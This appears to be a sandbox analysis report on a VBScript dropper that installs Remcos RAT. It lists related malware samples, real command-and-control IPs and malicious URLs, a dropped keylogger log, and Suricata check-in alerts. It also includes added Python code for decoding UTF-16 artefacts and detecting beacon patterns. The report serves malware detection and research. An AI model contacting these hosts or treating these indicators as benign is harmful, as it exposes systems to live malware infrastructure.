  | Contract_Agreement_Wednesday September 2024.pdf | malicious | Unknown | 162.159.61.3
  | http://linksapp.top:443 | malicious | Unknown | 104.21.74.63
  | RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 188.114.96.3
  | p37SE6gM52.exe | malicious | LummaC, Go Injector, LummaC Stealer | 104.21.37.97
  | 3ZD5tEC5DH.exe | malicious | LummaC | 172.67.208.139
  | HpCQgSai4e.exe | malicious | FormBook | 104.21.17.90
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | malicious | Unknown | 207.241.237.3
  | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
  | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
  | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
  | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm | 207.241.227.240
  | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
  | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
TELEBUCARAMANGASAESPCO | kz7iLmqRuq.exe | malicious | Quasar | 201.221.134.74
  | bVMuPnsMIq.elf | malicious | Mirai | 190.96.128.60
  | YfM6hAPQaS.elf | malicious | Mirai | 190.96.128.48
  | arm7.elf | malicious | Mirai | 190.96.128.56
  | 2YEUP84vcy.elf | malicious | Mirai | 190.13.19.189
  | 4eGsl7kZ8Y.elf | malicious | Mirai | 190.13.25.73
  | MGmADocDSa.elf | malicious | Mirai | 170.80.8.38
  | zEtEDBaBLY.elf | malicious | Mirai | 190.96.128.97
  | LUNFk2Hgfu.elf | malicious | Mirai, Okiru | 190.96.128.66
  | g7HXGuuY6X.elf | malicious | Mirai | 170.80.8.38
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3, 207.241.227.240
  | CMR_7649.EXE.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3, 207.241.227.240
  | RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 188.114.97.3, 207.241.227.240
  | RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 188.114.97.3, 207.241.227.240
  | QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 188.114.97.3, 207.241.227.240
  | 450230549.exe | malicious | AgentTesla | 188.114.97.3, 207.241.227.240
  | 450230549.exe | malicious | Unknown | 188.114.97.3, 207.241.227.240
  | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 188.114.97.3, 207.241.227.240
  | https://geminiqwc-sw.top/ | malicious | Unknown | 188.114.97.3, 207.241.227.240
  | http://tiktok1688.cc/ | malicious | Unknown | 188.114.97.3, 207.241.227.240
                                      No context
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):144
                                      Entropy (8bit):3.379519383183141
                                      Encrypted:false
                                      SSDEEP:3:rhlKlRlrPlDopCl55JWRal2Jl+7R0DAlBG45klovDl6v:6lnl55YcIeeDAlOWAv
                                      MD5:A3279C240C39B56C1A9C84CC8DAB9544
                                      SHA1:95B418A4BD1DF4D5A3DDDDB540626E8E17605718
                                      SHA-256:82E2AB4E01C396B6B72484BB183B2234B002953AC899F42343EE79480B5802FE
                                      SHA-512:8AE106E4D532C86A456CB7CF599F50AA01473BBEDEBD1E3DD99574B37ED11C6542FCE9C82290DC034526C9F8D8AF6CFCDA3D1E5FB1C4F4CB9268117042D96EC1
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                      Reputation:low
Preview:....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.8.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Decoded (the file is UTF-16LE; the preview renders each NUL high byte as a dot): "[2024/09/26 04:58:06 Offline Keylogger Started]" followed by "[Program Manager]". Remcos writes the foreground window title in brackets ahead of the keystrokes typed into it; "Program Manager" is the desktop itself, so no keystrokes had been captured when this snapshot was taken. The writing process, AddInProcess32.exe, is a legitimate .NET Framework host with no reason of its own to write under C:\ProgramData\remcos, which fits the process injection flagged in the signature list.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllul55bl/Z:NllU
                                      MD5:D3B86703AAED73DD3EC0A467E8E94A75
                                      SHA1:0F4F7B2D253B1E5317E0523C584323EFE648AFCC
                                      SHA-256:B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
                                      SHA-512:D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
                                      Malicious:false
                                      Reputation:low
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
Three further dropped files in this run are byte-for-byte identical to the entry above (same 60-byte content, MD5 D17FE0A3F47BE24A6453E9EF58C94641, not malicious). This is the probe file powershell.exe writes at start-up to test whether an AppLocker script policy is enforced; one copy per PowerShell process start is expected and carries no signal about the sample.
                                      File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Entropy (8bit):3.7378045422779724
                                      TrID:
                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                      • MP3 audio (1001/1) 32.22%
                                      • Lumena CEL bitmap (63/63) 2.03%
                                      • Corel Photo Paint (41/41) 1.32%
                                      File name:sostener.vbs
                                      File size:511'254 bytes
                                      MD5:3b4164bdb4cf6c49570c95714f8c17a5
                                      SHA1:13c7abef0333088056a8c11c951c97fcb878ad96
                                      SHA256:fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4
                                      SHA512:460bf20b6d30b4314703b67356828e540db80b43e3afc37ce2d075660370a4a306659075abe4a6895039df86316d95756441e40546d8d72daef7c5c11e7155ac
                                      SSDEEP:12288:n9D/msDMDwwpZcKHg9NR4A6sgmkhf1dM4Y6ebu5Z2PqoKuN8HUe5FXNbSEKOsyTE:Sbqj
                                      TLSH:FEB41A1135EAB008F1F22FA356FD55E94FABB5662A36912E7048074F4B93E80CE51B73
File Content Preview:..........i.W.W.G.i.A.f.d.i.i.J.i.L.u.O.m.R.g.h.m.B.o.m.W.k.Q.G.T.U.K.g.r.G.m.U.a.C.J.d.L.G.K.k.m.l.I.a.s.N.d.f.U.e.L.m.h.K.k.d.O.c.q.L.W.z.p.m.i. .=. .".p.U.q.G.Z.B.b.N.K.K.L.S.i.k.c.q.S.L.W.A.O.L.d.K.f.L.A.L.K.S.W.P.L.p.f.N.A.l.e.j.K.W.B.o.U.n.u.L.i.P.m
Decoded from UTF-16LE (the preview renders the BOM, the CRLF pairs and every NUL high byte as dots): after two blank lines the script begins iWWGiAfdiiJiLuOmRghmBomWkQGTUKgrGmUaCJdLGKkmlIasNdfUeLmhKkdOcqLWzpmi = "pUqGZBbNKKLSikcqSLWAOLdKfLALKSWPLpfNAlejKWBoUnuLiPm (cut off by the preview), a randomly named variable being assigned a string literal, consistent with the obfuscation the signature list flags. Because the file is UTF-16LE, byte-level string signatures written for ASCII will not match it unless the scanner decodes it first.
                                      Icon Hash:68d69b8f86ab9a86
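The two UTF-16LE artefacts on this page, the dropped registros.dat keylogger log and the sample itself, are both shown only as dotted previews. The following is an added example, not code from the Joe Sandbox report: it reconstructs registros.dat from its preview (the page lists 144 bytes and entropy 3.3795, which the reconstruction reproduces), reproduces the report's preview rendering, decodes both artefacts, and parses the key-log entries. REGISTROS and VBS_HEAD are constructed here and are not the real files; the key-log record format is inferred from only the two lines visible in the preview.

```python
"""Decode the report's UTF-16LE artefacts and reproduce its Preview field.

Added example; not code from the Joe Sandbox report.  REGISTROS and
VBS_HEAD are reconstructed from the two dotted previews in the report
(registros.dat and the first bytes of sostener.vbs); they are not the real
files, and the key-log record format is inferred from only the two lines
the preview shows.
"""
import hashlib
import math
import re
from collections import Counter

# Reconstructed from the registros.dat preview: 72 characters, no BOM,
# CRLF line ends, which gives the 144 bytes the report lists.
REGISTROS = (
    "\r\n[2024/09/26 04:58:06 Offline Keylogger Started]\r\n\r\n[Program Manager]\r\n"
).encode("utf-16-le")

# First bytes of sostener.vbs as implied by its preview: BOM, two blank
# lines, then a long randomly named variable being assigned a string.
VBS_HEAD = b"\xff\xfe" + (
    "\r\n\r\niWWGiAfdiiJiLuOmRghmBomWkQGTUKgrGmUaCJdLGKkmlIasNdfUeLmhKkdOcqLWzpmi"
    ' = "pUqGZBbNKKLSikcqSLWAOLdKfLALKSWPLpfNAlejKWBoUnuLiPm'
).encode("utf-16-le")

# The Preview value the report prints for registros.dat, with the two
# runs of dots for CRLF pairs written as counts.
REPORT_PREVIEW = (
    "....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.8.:.0.6. .O.f.f.l.i.n.e. "
    ".K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.]" + "." * 9 +
    "[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.]" + "." * 5
)

EVENT_RE = re.compile(r"^\[(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.+)\]$")
WINDOW_RE = re.compile(r"^\[(.+)\]$")


def preview(data, limit=160):
    """Render bytes as the report's Preview field does: printable ASCII is
    kept, every other byte (the NUL high bytes of UTF-16LE included) is '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:limit])


def shannon_entropy(data):
    """Bits per byte, the same 8-bit entropy figure the report lists."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def sniff_text(data):
    """Return (encoding, text).  A BOM decides first; without one, NULs in
    the odd byte positions mark BOM-less UTF-16LE; latin-1 is the fallback."""
    if data.startswith(b"\xff\xfe"):
        return "utf-16-le", data[2:].decode("utf-16-le", errors="replace")
    if data.startswith(b"\xfe\xff"):
        return "utf-16-be", data[2:].decode("utf-16-be", errors="replace")
    if data.startswith(b"\xef\xbb\xbf"):
        return "utf-8", data[3:].decode("utf-8", errors="replace")
    odd = data[1:512:2]
    if len(odd) >= 2 and odd.count(0) > 0.7 * len(odd):
        return "utf-16-le", data.decode("utf-16-le", errors="replace")
    try:
        return "utf-8", data.decode("utf-8")
    except UnicodeDecodeError:
        return "latin-1", data.decode("latin-1")


def parse_keylog(text):
    """Split a decoded registros.dat into (kind, when_or_title, detail) records:
    a timestamped status line, a bracketed foreground-window title, or, for
    anything else, captured keystrokes.  Format assumed from the preview."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = EVENT_RE.match(line)
        if m:
            records.append(("event", m.group(1), m.group(2)))
            continue
        m = WINDOW_RE.match(line)
        if m:
            records.append(("window", m.group(1), ""))
            continue
        records.append(("keys", "", line))
    return records


if __name__ == "__main__":
    print(len(REGISTROS), "bytes, entropy %.6f" % shannon_entropy(REGISTROS))
    print("md5", hashlib.md5(REGISTROS).hexdigest())  # compare with the report's value
    print("preview matches report:", preview(REGISTROS) == REPORT_PREVIEW)
    enc, text = sniff_text(REGISTROS)
    print(enc, parse_keylog(text))
    enc, head = sniff_text(VBS_HEAD)
    print(enc, repr(head))
    # raw-byte grep misses the UTF-16LE script, the decoded text matches
    print(b'zpmi = "' in VBS_HEAD, 'zpmi = "' in head)
```

Size and entropy agreeing with the report is a necessary check, not proof; compare the printed MD5 with the A3279C24... value in the dropped-file entry before treating the reconstruction as byte-exact. The last line is the practical point for detection content: any signature that greps raw bytes for ASCII tokens misses this dropper until the scanner decodes UTF-16LE.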
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T10:58:07.123709+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.6 | 49712 | 188.114.97.3 | 443 | TCP
2024-09-26T10:58:07.298698+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 188.114.97.3 | 443 | 192.168.2.6 | 49712 | TCP
2024-09-26T10:58:07.298698+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 188.114.97.3 | 443 | 192.168.2.6 | 49712 | TCP
2024-09-26T10:58:09.556119+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49713 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:12.269130+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49715 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:14.960707+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49716 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:17.587794+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49720 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:20.242842+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49722 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:22.913558+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49724 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:25.555536+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49725 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:28.210996+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49726 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:30.882978+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49727 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:33.508255+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49728 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:36.133301+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49729 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:38.805103+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49730 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:41.449621+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49732 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:44.056777+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52102 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:46.695749+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52103 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:49.321937+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52104 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:51.977856+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52105 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:54.639365+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52106 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:57.289503+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52107 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:59.931275+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52108 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:02.575895+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52109 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:05.211109+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52111 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:07.851896+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52112 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:20.958757+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52113 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:23.572392+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52114 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:26.214181+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52115 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:28.854186+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52116 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:31.526186+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52117 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:34.132700+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52119 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:36.773249+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52120 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:39.460610+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52121 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:42.104552+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52122 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:44.711300+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52123 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:47.322623+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52124 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:49.853288+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52125 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:52.402234+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52126 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:54.930365+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52127 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:57.386279+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52128 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:59:59.806269+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52129 | 181.236.206.3 | 2404 | TCP
2024-09-26T11:00:02.198263+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52130 | 181.236.206.3 | 2404 | TCP
2024-09-26T11:00:04.601059+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52131 | 181.236.206.3 | 2404 | TCP
2024-09-26T11:00:06.976502+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 52132 | 181.236.206.3 | 2404 | TCP
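Three things in the alert table above are worth reading off before writing a hunting query: the Remcos check-ins to 181.236.206.3:2404 arrive roughly every 2.6 seconds, every one of them comes from a fresh ephemeral source port (49713 through 52132), so each check-in is a new TCP connection rather than a held session, and there is a single 13-second hole between 10:59:07 and 10:59:20. The following is an added example, not code from the Joe Sandbox report, that turns those observations into a beacon check run over rows copied from the table. It groups alerts by flow and SID, measures inter-arrival jitter with a median-based statistic so that one missed beat does not hide the cadence, and records whether the source port changed on every hit. ALERTS holds nine rows re-typed from the report in a pipe-delimited form; LATE_ROW is a constructed extra check-in that mimics the 13-second gap; the min_count and max_jitter thresholds are assumptions for this illustration, not Suricata or Joe Sandbox settings.

```python
"""Beacon-cadence check over Suricata alert rows.

Added example; not code from the Joe Sandbox report.  ALERTS holds nine
rows copied from the report's alert table (re-typed in a pipe-delimited
form); LATE_ROW is constructed; min_count and max_jitter are assumptions
chosen for this illustration, not Suricata or Joe Sandbox settings.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

FIELDS = ("ts", "sid", "signature", "severity",
          "src_ip", "src_port", "dst_ip", "dst_port", "proto")

# Constructed input: the paste.ee hit plus the first eight Remcos check-ins
# from the report, one alert per line, columns in FIELDS order.
ALERTS = """\
2024-09-26T10:58:07.123709+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.6 | 49712 | 188.114.97.3 | 443 | TCP
2024-09-26T10:58:09.556119+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49713 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:12.269130+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49715 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:14.960707+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49716 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:17.587794+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49720 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:20.242842+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49722 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:22.913558+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49724 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:25.555536+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49725 | 181.236.206.3 | 2404 | TCP
2024-09-26T10:58:28.210996+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.6 | 49726 | 181.236.206.3 | 2404 | TCP
"""

# Constructed: one extra check-in 13.1 s after the last real one (the source
# port is made up), mimicking the single missed beat the full table shows
# between 10:59:07 and 10:59:20.
LATE_ROW = ("2024-09-26T10:58:41.311004+0200 | 2032776 | ET MALWARE Remcos 3.x "
            "Unencrypted Checkin | 1 | 192.168.2.6 | 49799 | 181.236.206.3 | 2404 | TCP\n")


def parse_alerts(text):
    """Turn the delimited rows into dicts with typed ports, SID and an aware datetime."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != len(FIELDS):
            raise ValueError(f"expected {len(FIELDS)} columns: {line!r}")
        row = dict(zip(FIELDS, parts))
        row["ts"] = datetime.strptime(row["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
        for key in ("sid", "severity", "src_port", "dst_port"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def find_beacons(alerts, min_count=5, max_jitter=0.25):
    """Group alerts by (src_ip, dst_ip, dst_port, sid) and report periodic series.

    jitter is median absolute deviation / median of the inter-arrival gaps; unlike
    stdev / mean (kept as cv for comparison) it is not blown up by one long gap.
    A series is a beacon when it has at least min_count hits and jitter <= max_jitter.
    """
    groups = defaultdict(list)
    for a in alerts:
        groups[(a["src_ip"], a["dst_ip"], a["dst_port"], a["sid"])].append(a)

    beacons = []
    for (src_ip, dst_ip, dst_port, sid), hits in groups.items():
        if len(hits) < max(2, min_count):
            continue
        hits.sort(key=lambda a: a["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        med = median(gaps)
        jitter = median(abs(g - med) for g in gaps) / med if med > 0 else float("inf")
        if jitter > max_jitter:
            continue
        avg = mean(gaps)
        beacons.append({
            "src_ip": src_ip, "dst_ip": dst_ip, "dst_port": dst_port, "sid": sid,
            "signature": hits[0]["signature"],
            "count": len(hits),
            "median_gap": med, "jitter": jitter,
            "mean_gap": avg, "cv": pstdev(gaps) / avg if avg > 0 else float("inf"),
            # A distinct ephemeral source port on every hit means each
            # check-in opened a new TCP connection instead of reusing one.
            "reconnects_each_time": len({a["src_port"] for a in hits}) == len(hits),
        })
    return beacons


if __name__ == "__main__":
    for label, text in (("report rows", ALERTS), ("with one missed beat", ALERTS + LATE_ROW)):
        for b in find_beacons(parse_alerts(text)):
            print(f"{label}: {b['src_ip']} -> {b['dst_ip']}:{b['dst_port']} sid={b['sid']} "
                  f"hits={b['count']} median={b['median_gap']:.2f}s jitter={b['jitter']:.3f} "
                  f"cv={b['cv']:.3f} reconnects={b['reconnects_each_time']}")
```

The paste.ee alert is a single hit and never qualifies; the Remcos series does, with a median gap of about 2.66 s and jitter near 0.006. Appending LATE_ROW pushes the classic stdev/mean figure above 0.8 while the median-based jitter stays under 0.01, which is the reason to prefer a robust dispersion measure when the C2 drops a beat, as it did once in this run.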
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 10:58:03.343214989 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:03.343291044 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:03.343401909 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:03.353288889 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:03.353363991 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:03.954437017 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:03.954545021 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:03.957101107 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:03.957117081 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:03.957484007 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:03.967825890 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.011415958 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.238998890 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.239031076 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.239049911 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.239136934 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.239168882 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.239209890 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.260369062 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.260396957 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.260488033 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.260497093 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
Sep 26, 2024 10:58:04.261785984 CEST | 49711 | 443 | 192.168.2.6 | 207.241.227.240
Sep 26, 2024 10:58:04.306307077 CEST | 443 | 49711 | 207.241.227.240 | 192.168.2.6
